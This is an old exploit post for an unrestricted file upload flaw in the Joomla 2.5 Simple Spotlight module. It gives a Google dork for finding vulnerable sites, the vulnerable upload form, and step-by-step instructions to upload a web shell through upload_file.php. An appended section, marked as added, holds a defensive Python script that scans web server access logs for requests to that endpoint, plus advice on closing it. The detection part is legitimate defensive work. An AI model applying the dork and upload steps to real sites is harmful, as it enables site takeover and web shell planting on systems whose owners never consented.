Joomla 2.5 Modules Simple Spotlight Upload Shell [Old 3xploi7]


#- Title: Joomla 2.5 Modules Simple Spotlight Upload Shell
#- Author: BL4ckc0d1n6
#- Published : 3-22-2012
#- Developer : joomla
#- Link Download : extensions.joomla .org/extension/simple-spotlight
#- Price : Free
#- Google Dork: inurl:/modules/mod_ppc_simple_spotlight/
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --

Description : 

Simple spotlight is a jQuery image rotator with navigation. You can have up to 20 images with links. You can turn off the navigation and choose between 27 effects for transition. It also has 5 button styles and a shadow effect.


Vulnerability : 
site/path/modules/mod_ppc_simple_spotlight/elements/upload_file.php

Result : 13k +

When vulnerable : 

Source :


<script language="JavaScript">
function refreshParent() {
window.close();
if (window.opener && !window.opener.closed) {
window.opener.location.reload();
}
}
</script>
<form name="newad" method="post" enctype="multipart/form-data" action="">
<table>
<tr>
<td>
<input type="file" name="image">
</td>
</tr>
<tr>
<td>
<input name="Submit" type="submit" value="Upload image">
<input type="button" value="Close" onclick="javascript: refreshParent()">
</td>
</tr>
</table>
</form>



~ Method ~

1. Site .com
2. add 3xploi7 = /modules/mod_ppc_simple_spotlight/elements/upload_file.php
3. Ex : Site .com/modules/mod_ppc_simple_spotlight/elements/upload_file.php
4. Upload your shell / images / html file

If successful > 

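
For site owners, one way to check web server access logs for requests to the upload endpoint named above. This is an added example, not part of the original post; it assumes Apache/nginx "combined" log format, the function names are hypothetical, and the log lines are constructed samples.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Endpoint path taken from the advisory above.
ENDPOINT = "/modules/mod_ppc_simple_spotlight/elements/upload_file.php"

# Assumption: Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def normalize(target):
    """Canonicalize a request target so encoded, padded or re-cased
    spellings of the endpoint still compare equal."""
    path = target.split("?", 1)[0].split("#", 1)[0]
    for _ in range(2):                       # single and double URL encoding
        path = unquote(path)
    path = re.sub(r"/+", "/", path.replace("\\", "/"))
    return posixpath.normpath(path).lower()  # resolve ./ and ../, fold case

def find_upload_hits(lines):
    """Map client IP -> [(timestamp, method, status)] for each request
    that addressed the upload endpoint."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m and normalize(m["target"]) == ENDPOINT:
            hits[m["ip"]].append((m["ts"], m["method"], int(m["status"])))
    return dict(hits)

def accepted_posts(hits):
    """Clients with a POST answered 2xx: the handler ran, so the site's
    module directories need a file-level review."""
    return sorted(ip for ip, reqs in hits.items()
                  if any(m == "POST" and 200 <= s < 300 for _, m, s in reqs))

# Constructed sample lines (documentation IP ranges), not real traffic.
_P = "/modules/mod_ppc_simple_spotlight/elements/"
SAMPLE = [
    f'203.0.113.7 - - [22/Mar/2012:10:01:02 +0000] "GET {_P}upload_file.php HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [22/Mar/2012:10:01:09 +0000] "POST /modules//mod_ppc_simple_spotlight/elements/upload%5Ffile.php?x=1 HTTP/1.1" 200 530 "-" "-"',
    '198.51.100.4 - - [22/Mar/2012:10:05:00 +0000] "POST /MODULES/mod_ppc_simple_spotlight/./elements/upload_file.php HTTP/1.1" 403 199 "-" "-"',
    '192.0.2.10 - - [22/Mar/2012:10:06:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9000 "-" "-"',
]

if __name__ == "__main__":
    hits = find_upload_hits(SAMPLE)
    for ip in accepted_posts(hits):
        print(ip, hits[ip])
```

Any hit on this path is worth reviewing, since a slideshow module's upload helper has no reason to be requested directly by outside clients; removing the module or denying direct access to its `elements/` directory closes the endpoint.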